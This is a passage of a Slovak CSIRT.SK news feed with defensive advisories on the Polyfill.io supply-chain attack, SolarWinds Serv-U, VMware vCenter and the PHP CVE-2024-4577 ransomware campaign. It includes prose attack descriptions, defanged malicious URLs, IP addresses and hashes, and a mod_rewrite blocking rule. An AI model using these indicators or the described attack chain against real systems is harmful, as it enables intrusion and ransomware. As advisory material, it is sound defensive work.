					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/polyfill.webp" alt="" /></p>Po odkúpení služby Polyfill.io, ktorá poskytuje knižnicu pre webové aplikácie polyfill.js, sa zistilo, že nový majiteľ upravil funkcionalitu skriptu tak,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/polyfill.webp" alt="" /></p>
<p><strong>Po odkúpení služby Polyfill.io, ktorá poskytuje knižnicu pre webové aplikácie polyfill.js, sa zistilo, že nový majiteľ upravil funkcionalitu skriptu tak, aby presmerovával požívateľov na škodlivé webstránky. Odporúčame prestať danú knižnicu používať, alebo nahradiť jej zdroj dôveryhodným zdrojom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Polyfill.js (Polyfill.io, Polyfill.com, &#8230; vlastnené spoločnosťou Funnull)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p>Čínska firma Funnull kúpila vo februári doménu služby Polyfill.io, ktorá poskytuje knižnicu polyfill.js, spolu s&nbsp;účtom na platforme Github. Uvedená JavaScriptová knižnica poskytuje podporu niektorých funkcionalít webových prehliadačov. Krátko po odkúpení začala knižnica presmerovávať používateľov na škodlivé webové stránky. Spoločnosť totiž knižnicu upravila.</p>



<p>Škodlivá funkcionalita presmerovávala používateľov na určitých mobilných zariadeniach v&nbsp;určitých časoch na stránky spojené so stávkovaním a&nbsp;s&nbsp;pornografickým obsahom. Pokiaľ detegovala administrátorské oprávnenia, presmerovanie sa nespustilo.</p>



<p>Knižnicu v&nbsp;súčasnosti využíva vyše 110&nbsp;000 webstránok. Podľa vyjadrenia zakladateľa projektu Andrewa Bettsa knižnica už v&nbsp;dnešnej dobe nie je potrebná, pretože prehliadače jej funkcionality implementujú priamo vo svojom kóde.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Presmerovanie na škodlivé webstránky</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Vývojári polyfill.js odporúčajú bezodkladne odstrániť túto knižnicu z&nbsp;Vašich webových aplikácií. Pokiaľ potrebujete využívať jej funkcionality, môžete ju nahradiť dôveryhodnými zdrojmi polyfill.js od </strong><a href="https://community.fastly.com/t/new-options-for-polyfill-io-users/2540"><strong>Fastly</strong></a><strong> alebo </strong><a href="https://cdnjs.cloudflare.com/polyfill"><strong>Cloudflare</strong></a><strong>.</strong></p>



<p><strong>Zabezpečte sa voči útokom na knižnice JS tretích strán:</strong></p>



<ul>
<li><strong>Monitorujte nezvyčajnú aktivitu služieb tretích strán</strong></li>



<li><strong>Implementujte Content Security Policy (CSP), čím obmedzíte zdroje, odkiaľ môžu Vaše služby načítavať knižnice a&nbsp;skripty</strong></li>



<li><strong>Implementujte Subresource Integrity (SRI), čím zabezpečíte, že skripty tretích strán neboli pozmenené</strong></li>



<li><strong>Manažujte závislosti, obmedzte ich na nutné minimum a&nbsp;pravidelne ich aktualizujte</strong></li>
</ul>



<p><strong>Indikátory kompromitácie:</strong></p>



<ul>
<li>hXXps://kuurza.com/redirect?from=bitget</li>



<li>hXXps://www.googie-anaiytics.com/html/checkcachehw.js</li>



<li>hXXps://www.googie-anaiytics.com/ga.js</li>



<li>hXXps://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js</li>



<li>hXXps://union.macoms.la/jquery.min-4.0.2.js</li>



<li>hXXps://newcrbpc.com/redirect?from=bscbc</li>



<li>bootcdn[.]net</li>



<li>staticfile[.]net</li>



<li>staticfile[.]org</li>



<li>unionadjs[.]com</li>



<li>xhsbpza[.]com</li>
</ul>



<p><strong>Zdroje:</strong></p>



<p><a href="https://sansec.io/research/polyfill-supply-chain-attack">https://sansec.io/research/polyfill-supply-chain-attack</a></p>



<p><a href="https://thehackernews.com/2024/06/over-110000-websites-affected-by.html">https://thehackernews.com/2024/06/over-110000-websites-affected-by.html</a></p>



<p><a href="https://www.sonatype.com/blog/polyfill.io-supply-chain-attack-hits-100000-websites-all-you-need-to-know">https://www.sonatype.com/blog/polyfill.io-supply-chain-attack-hits-100000-websites-all-you-need-to-know</a></p>



<p><a href="https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet">https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet</a></p>



<p><a href="https://polykill.io/">https://polykill.io/</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/polyfillio-bootcdn-bootcss-staticfile-attack-traced-to-1-operator/">https://www.bleepingcomputer.com/news/security/polyfillio-bootcdn-bootcss-staticfile-attack-traced-to-1-operator/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1065/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Službu Achilles rozširujeme o monitoring dostupnosti (Domino)</title>
		<link>/posts/1057</link>
					<comments>/posts/1057#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 25 Jun 2024 13:14:22 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Achilles]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<category><![CDATA[vulnerability assessment]]></category>
		<guid isPermaLink="false">/?p=1057</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/06/pexels-freestockpro-12969405-1024x683.jpg" alt="" /></p>V rámci projektu Achilles poskytuje CSIRT.SK aj možnosť pravidelného overovania dostupnosti aktív danej organizácie, napr. webových serverov a služieb, prostredníctvom...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/06/pexels-freestockpro-12969405-1024x683.jpg" alt="" /></p><p class="MsoNormal">V rámci projektu Achilles poskytuje CSIRT.SK aj možnosť <b style="mso-bidi-font-weight: normal;">pravidelného overovania dostupnosti aktív</b> danej organizácie, napr. webových serverov a služieb, prostredníctvom systému Domino. Cieľom je <b style="mso-bidi-font-weight: normal;">detekcia pokusu o útok typu odoprenie služby</b> (angl. Denial of Service, skr. <b style="mso-bidi-font-weight: normal;">DoS</b>), pomocou ktorej vieme informovať prevádzkovateľa danej webovej služby o jej nedostupnosti.</p>
<p class="MsoNormal">Z toho dôvodu je možné, že na daných infraštruktúrach budú evidované <b style="mso-bidi-font-weight: normal;">frekventované požiadavky typu GET</b> (protokol HTTPS), pochádzajúce z IP adries CSIRT.SK, ktoré sa opakujú <b style="mso-bidi-font-weight: normal;">v pravidelných intervaloch</b>.</p>
<p class="MsoNormal">V prípade, že by ste mali záujem pridať (príp. odobrať) aktíva v rámci tejto služby, kontaktujte nás cez e-mail na adrese achilles@csirt.sk. Do tela e-mailu taktiež napíšte domény, o ktoré sa jedná.</p>
<p class="MsoNormal">Príklad:</p>
<p class="MsoNormal" style="margin-bottom: .0001pt;">&#8221; Predmet: DOMINO &#8211; ZMENA ZOZNAMU AKTÍV</p>
<p class="MsoNormal">Touto cestou by som Vás chcel požiadať o zrušenie overovania dostupnosti pre nasledujúce aktíva:</p>
<p class="MsoNormal" style="margin-bottom: .0001pt;">test.csirt.sk</p>
<p class="MsoNormal" style="margin-bottom: .0001pt;">ddos.csirt.sk&#8221;</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1057/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť umožňuje získanie obsahu súborov zo SolarWinds Serv-U</title>
		<link>/posts/1050</link>
					<comments>/posts/1050#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 25 Jun 2024 07:54:51 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Solarwinds]]></category>
		<guid isPermaLink="false">/?p=1050</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/06/blob.png" alt="" /></p>Spoločnosť SolarWinds vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť v platforme na prenos súborov Serv-U. Zraniteľnosť umožňujúcu prechádzanie adresárov možno...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/06/blob.png" alt="" /></p>
<p> <p class="MsoNormal" style="text-align:justify"><b>Spoločnosť SolarWinds vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť v platforme na prenos súborov Serv-U. Zraniteľnosť umožňujúcu prechádzanie adresárov možno zneužiť na čítanie obsahu súborov na hostiteľskom systéme.</b></p></p>



<p><p class="MsoNormal" style="text-align:justify;line-height:150%"><b>Zraniteľné systémy:</b></p><ul style="margin-top:0cm" type="disc"><li class="MsoNormal" style="text-align:justify;mso-list:l0 level1 lfo2">SolarWinds Serv-U vo verziách starších ako 15.4.2 HF 2</li></ul><p class="MsoNormal" style="text-align:justify"><b style="mso-bidi-font-weight:
normal">Opis činnosti:</b></p><p class="MsoNormal" style="text-align:justify"><b style="mso-bidi-font-weight:
normal">CVE-2024-28995</b> (CVSS skóre 8,6)</p><p class="MsoNormal" style="text-align:justify">Aktívne zneužívaná zraniteľnosť umožňuje prechádzanie obsahu adresárov a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP GET požiadaviek mohol zneužiť na získanie neoprávneného prístupu ku všetkým súborom na súborovom systéme, vrátane súborov obsahujúcich prihlasovacie údaje, certifikáty a ďalších súborov s citlivými údajmi. V súčasnosti je verejne dostupný nástroj na vyhľadávanie zraniteľných systémov a proof-of-concept kód demonštrujúci návod na jej zneužitie. </p><p class="MsoNormal" style="text-align:justify"><b>Možné škody:</b></p><ul style="margin-top:0cm" type="disc"><li class="MsoNormal" style="text-align:justify;mso-list:l1 level1 lfo1;
     tab-stops:list 36.0pt"><b>Neoprávnený prístup k citlivým údajom</b></li></ul><p class="MsoNormal" style="text-align:justify"><b>Odporúčania:</b></p><p class="MsoNormal" style="text-align:justify"><b>Výrobca odporúča bezodkladnú aktualizáciu zraniteľných produktov na verziu 15.4.2 HF2. Vzhľadom na to, že inštalácia tejto aktualizácie vyžaduje verziu 15.4.2 HF1, postupujte podľa návodu na </b><a href="https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-4-2-Hotfix-2-Release-Notes"><b>stránke výrobcu</b></a><b>.</b></p><p class="MsoNormal" style="text-align:justify"><b>Zdroje:</b></p><p class="MsoNormal" style="margin-bottom:0cm;margin-bottom:.0001pt;text-align:
justify;line-height:115%"><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995</a></p><p class="MsoNormal" style="margin-bottom:0cm;margin-bottom:.0001pt;text-align:
justify;line-height:115%"><a href="https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-4-2-Hotfix-2-Release-Notes">https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-4-2-Hotfix-2-Release-Notes</a></p><p class="MsoNormal" style="margin-bottom:0cm;margin-bottom:.0001pt;text-align:
justify;line-height:115%"><a href="https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/">https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/</a></p><p class="MsoNormal" style="margin-bottom:0cm;margin-bottom:.0001pt;text-align:
justify;line-height:115%"><a href="https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/">https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/</a></p><p class="MsoNormal" style="margin-bottom:0cm;margin-bottom:.0001pt;text-align:
justify;line-height:115%"><a href="https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html">https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html</a></p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1050/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti vo VMware vCenter Server</title>
		<link>/posts/1046</link>
					<comments>/posts/1046#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 21 Jun 2024 11:43:50 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Broadcom]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[VMware]]></category>
		<category><![CDATA[zraniteľnosť]]></category>
		<guid isPermaLink="false">/?p=1046</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú 3 bezpečnostné zraniteľnosti v produkte VMware vCenter Server. Z nich 2 sú označené ako kritické....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p><p class="MsoNoSpacing" style="text-align: justify;"><b style="mso-bidi-font-weight: normal;">Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú 3 bezpečnostné zraniteľnosti v produkte VMware vCenter Server. Z nich 2 sú označené ako kritické. Zraniteľnosti možno zneužiť na eskaláciu privilégií a vzdialené vykonanie kódu.</b></p>
<p class="MsoNoSpacing"><b style="mso-bidi-font-weight: normal;">Zraniteľné systémy:</b></p>
<p class="MsoNoSpacing" style="margin-left: 36.0pt; text-indent: -18.0pt; mso-list: l0 level1 lfo1;"><span style="font-family: Symbol; mso-fareast-font-family: Symbol; mso-bidi-font-family: Symbol; color: #272b30; mso-font-kerning: 0pt; mso-ligatures: none; mso-fareast-language: SK;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt 'Times New Roman';">         </span></span></span><span style="mso-fareast-font-family: 'Times New Roman'; color: #272b30; mso-font-kerning: 0pt; mso-ligatures: none; mso-fareast-language: SK;">VMware vCenter Server vo verzii 7.0 </span></p>
<p class="MsoNoSpacing" style="margin-left: 36.0pt; text-indent: -18.0pt; mso-list: l0 level1 lfo1;"><span style="font-family: Symbol; mso-fareast-font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-language: SK;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt 'Times New Roman';">         </span></span></span><span style="mso-fareast-font-family: 'Times New Roman'; color: #272b30; mso-font-kerning: 0pt; mso-ligatures: none; mso-fareast-language: SK;">VMware vCenter Server vo verzii 8.0</span></p>
<p class="MsoNoSpacing" style="text-align: justify;"><span style="mso-fareast-font-family: 'Times New Roman'; color: #272b30; mso-font-kerning: 0pt; mso-ligatures: none; mso-fareast-language: SK;">Poznámka: vCenter Server je tiež súčasťou produktov VMware vSphere a VMware Cloud Foundation</span></p>
<p class="MsoNoSpacing"><span style="mso-fareast-font-family: 'Times New Roman'; color: #272b30; mso-font-kerning: 0pt; mso-ligatures: none; mso-fareast-language: SK;"> </span><b style="mso-bidi-font-weight: normal;"><span style="mso-fareast-font-family: 'Times New Roman'; color: #272b30; mso-font-kerning: 0pt; mso-ligatures: none; mso-fareast-language: SK;">Opis činnosti:</span></b></p>
<p class="MsoNoSpacing"><b style="mso-bidi-font-weight: normal;"><span style="mso-fareast-font-family: 'Times New Roman'; color: #272b30; mso-font-kerning: 0pt; mso-ligatures: none; mso-fareast-language: SK;"> </span></b><strong><span style="font-family: 'Calibri',sans-serif; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; color: #2b384e; border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm; background: white;">CVE-2024-37079, CVE-2024-37080 </span></strong><span style="color: #2b384e; background: white;">(CVSS skóre 9.8)</span></p>
<p class="MsoNoSpacing" style="text-align: justify;">Chyby pretečenia haldy v implementácii protokolu DCE<span lang="EN-US" style="mso-ansi-language: EN-US;">/</span>RPC by vzdialený neautentifikovaný útočník mohol zneužiť na vykonanie škodlivého kódu. Zraniteľnosť možno zneužiť odoslaním špeciálne vytvoreného paketu.</p>
<p class="MsoNoSpacing"><span style="color: #2b384e; background: white;"> </span><strong><span style="font-family: 'Calibri',sans-serif; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; color: #2b384e; border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm; background: white;">CVE-2024-37081</span></strong><span style="color: #2b384e; background: white;"> (CVSS skóre 7.8)</span></p>
<p class="MsoNoSpacing" style="text-align: justify;">Zraniteľnosť spočíva v nesprávnej konfigurácii sudo a lokálny autentifikovaný útočník bez administrátorských oprávnení by ju mohol zneužiť na eskaláciu privilégií na úroveň používateľa „root“.</p>
<p class="MsoNoSpacing"><b style="mso-bidi-font-weight: normal;"> </b><b style="mso-bidi-font-weight: normal;">Možné škody:</b></p>
<p class="MsoNoSpacing" style="margin-left: 36.0pt; text-indent: -18.0pt; mso-list: l1 level1 lfo2;"><span style="font-family: Symbol; mso-fareast-font-family: Symbol; mso-bidi-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt 'Times New Roman';">         </span></span></span><b style="mso-bidi-font-weight: normal;">Eskalácia privilégií</b></p>
<p class="MsoNoSpacing" style="margin-left: 36.0pt; text-indent: -18.0pt; mso-list: l1 level1 lfo2;"><span style="font-family: Symbol; mso-fareast-font-family: Symbol; mso-bidi-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt 'Times New Roman';">         </span></span></span><b style="mso-bidi-font-weight: normal;">Vzdialené vykonávanie kódu</b></p>
<p class="MsoNoSpacing"> <b style="mso-bidi-font-weight: normal;">Odporúčania:</b></p>
<p class="MsoNoSpacing"><b style="mso-bidi-font-weight: normal;">Bezodkladná aktualizácia VMware <span style="color: #272b30; background: white;">vCenter Server na verzie 7.0 U3r, 8.0 U2d alebo 8.0 U1e. Keďže je vCenter Server súčasťou VMware Cloud Foundation, výrobca odporúča aj inštaláciu aktualizácií </span></b><a href="https://knowledge.broadcom.com/external/article?legacyId=88287"><b style="mso-bidi-font-weight: normal;"><span style="background: white;">KB88287</span></b></a><b style="mso-bidi-font-weight: normal;"><span style="color: #272b30; background: white;">.</span></b></p>
<p class="MsoNoSpacing"><b style="mso-bidi-font-weight: normal;">Zdroje:</b></p>
<p class="MsoNoSpacing"><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453"><b>https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453</b></a></p>
<p class="MsoNoSpacing"><a href="https://core.vmware.com/resource/vmsa-2024-0012-questions-answers#introduction"><b>https://core.vmware.com/resource/vmsa-2024-0012-questions-answers#introduction</b></a></p>
<p class="MsoNoSpacing"><a href="https://thehackernews.com/2024/06/vmware-issues-patches-for-cloud.html"><b>https://thehackernews.com/2024/06/vmware-issues-patches-for-cloud.html</b></a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1046/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť PHP zneužívaná na šírenie ransomvéru</title>
		<link>/posts/1038</link>
					<comments>/posts/1038#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 14 Jun 2024 11:03:14 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1038</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/06/php.jpg" alt="" /></p>Vývojári skriptovacieho jazyka PHP vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. Chyba súvisí s&#160;konverziou kódovania znakov cez funkciu Windows Best-Fit...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/06/php.jpg" alt="" /></p>
<p><strong>Vývojári skriptovacieho jazyka PHP vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. Chyba súvisí s&nbsp;konverziou kódovania znakov cez funkciu Windows Best-Fit a&nbsp;prostredníctvom injekcie príkazov ju možno zneužiť na vzdialené vykonanie kódu. Zraniteľnosť je v&nbsp;súčasnosti aktívne zneužívaná na šírenie ransomvéru TellYouThePass.</strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>PHP pre Windows, všetky verzie od 5.X</p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-4577</strong> (CVSS v3.1 skóre 9,8)</p>



<p>Kritická zraniteľnosť jazyka PHP, ktorá umožňuje vzdialené vykonávanie kódu na zraniteľných PHP serveroch injektovaním premenných. Chyba súvisí s&nbsp;konverziou kódovania znakov cez funkciu Best-Fit pre Windows, ktorá môže konvertovať znaky vo funkciách Win32&nbsp;API. PHP modul CGI môže tento výstup interpretovať ako premenné, resp. príkazy PHP.</p>



<p>Pokiaľ PHP nie je v&nbsp;CGI móde, zraniteľnosť môžu útočníci zneužiť v&nbsp;prípade, že súbory php.exe a&nbsp;php-cgi.exe sa nachádzajú v&nbsp;priečinkoch prístupných pre webový server (prednastavená konfigurácia napríklad pre XAMPP).</p>



<p>Zraniteľnosť objavil Orange Tsai, výskumník spoločnosti Devcore.</p>



<p><strong>Zneužitie zraniteľnosti pri ransomvérových útokoch</strong></p>



<p>Útočníci zraniteľnosť zneužívajú prostredníctvom zaslania špeciálne vytvorenej požiadavky HTTP POST na vykonanie obsahu škodlivého HTA súboru na webovom serveri útočníka prostredníctvom mshta.exe (natívna aplikácia MS Windows). HTA obsahuje kód VBScript slúžiaci na dekódovanie sekvencie bajtov, ktorá je počas behu skriptu nahratá priamo do operačnej pamäte zraniteľných systémov. Analýza spoločnosti IMPERVA ukázala, že sa jedná o .NET variant ransomvéru TellYouThePass. Táto rodina ransomvéru je aktívna už od roku 2019.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Vzdialené vykonávanie kódu</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča používať len verzie PHP, ktoré majú technickú podporu a zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie<strong>: </strong>8.3.8,&nbsp;8.2.20 alebo 8.1.29<strong>.</strong></p>



<p><strong>Ak nie je možná aktualizácia, zraniteľnosť je možné mitigovať nasledujúcim pravidlom mod_rewrite, ako napríklad:</strong></p>



<p>RewriteEngine On</p>



<p>RewriteCond %{QUERY_STRING} ^%ad [NC]</p>



<p>RewriteRule .? – [F,L]</p>



<p><strong>Ak používate platformu XAMPP, </strong><a href="https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/">mitigovať zraniteľnosť</a><strong> môžete zakomentovaním riadku „ScriptAlias“ v&nbsp;konfiguračnom súbore Apache.</strong></p>



<p><strong>Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie (IOC) v logoch sieťových a bezpečnostných prvkov.</strong></p>



<p><strong>Indikátory kompromitácie (IOC):</strong></p>



<p><strong>SHA256 hashe súborov:</strong></p>



<p>95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3 (HTA)<br>5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618 (HTA)<br>9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53 (.NET malvér)</p>



<p><strong>IP adresy:</strong></p>



<p>18.141.81 [.]39</p>



<p>45.130.22 [.]219</p>



<p>59.31.203 [.]57</p>



<p>61.160.194 [.]160</p>



<p>88.218.76[.]13</p>



<p>93.95.228 [.]70</p>



<p>107.175.127[.]195</p>



<p>120.77.82 [.]232</p>



<p><strong>URL:</strong></p>



<p>hxxp:/88.218.76[.]13/dd3.hta<br>hxxp://107.175.127[.]195/</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/security/php-fixes-critical-rce-flaw-impacting-all-versions-for-windows/">https://www.bleepingcomputer.com/news/security/php-fixes-critical-rce-flaw-impacting-all-versions-for-windows/</a></p>



<p><a href="https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/">https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/</a></p>



<p><a href="https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/">https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-4577">https://nvd.nist.gov/vuln/detail/CVE-2024-4577</a></p>



<p><a href="https://www.imperva.com/blog/update-cve-2024-4577-quickly-weaponized-to-distribute-tellyouthepass-ransomware/">https://www.imperva.com/blog/update-cve-2024-4577-quickly-weaponized-to-distribute-tellyouthepass-ransomware/</a></p>



<p><a href="https://cert.360.cn/report/detail?id=65fceeb4c09f255b91b17f11">https://cert.360.cn/report/detail?id=65fceeb4c09f255b91b17f11</a></p>



<p><a href="https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/new-tellyouthepass-ransomware-variant-discovered">https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/new-tellyouthepass-ransomware-variant-discovered</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1038/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci júnového Patch Tuesday opravil kritickú zraniteľnosť v MSMQ</title>
		<link>/posts/1033</link>
					<comments>/posts/1033#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 14 Jun 2024 06:08:40 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1033</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v&#160;júni 2024 balík opráv pre portfólio svojich produktov opravujúci 51 zraniteľností, z&#160;ktorých 18 umožňuje vzdialené vykonávanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v&nbsp;júni 2024 balík opráv pre portfólio svojich produktov opravujúci 51 zraniteľností, z&nbsp;ktorých 18 umožňuje vzdialené vykonávanie kódu. Kritická bezpečnostná zraniteľnosť sa nachádza v&nbsp;produkte Microsoft Message Queuing.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Azure Data Science Virtual Machines for Linux</li>



<li>Azure File Sync v16.0</li>



<li>Azure File Sync v17.0</li>



<li>Azure File Sync v18.0</li>



<li>Azure Identity Library for .NET</li>



<li>Azure Identity Library for C++</li>



<li>Azure Identity Library for Go</li>



<li>Azure Identity Library for Java</li>



<li>Azure Identity Library for JavaScript</li>



<li>Azure Identity Library for Python</li>



<li>Azure Monitor Agent</li>



<li>Azure Storage Movement Client Library for .NET</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Authentication Library (MSAL) for .NET</li>



<li>Microsoft Authentication Library (MSAL) for Java</li>



<li>Microsoft Authentication Library (MSAL) for Node.js</li>



<li>Microsoft Dynamics 365 (on-premises) version 9.1</li>



<li>Microsoft Dynamics 365 Business Central 2023 Release Wave 1</li>



<li>Microsoft Dynamics 365 Business Central 2023 Release Wave 2</li>



<li>Microsoft Dynamics 365 Business Central 2024 Release Wave 1</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Outlook 2016 (32-bit edition)</li>



<li>Microsoft Outlook 2016 (64-bit edition)</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Visual Studio 2017 version 15.9 (includes 15.0 &#8211; 15.8)</li>



<li>Microsoft Visual Studio 2019 version 16.11 (includes 16.0 &#8211; 16.10)</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



<li>Microsoft Visual Studio 2022 version 17.4</li>



<li>Microsoft Visual Studio 2022 version 17.6</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for ARM64-based Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



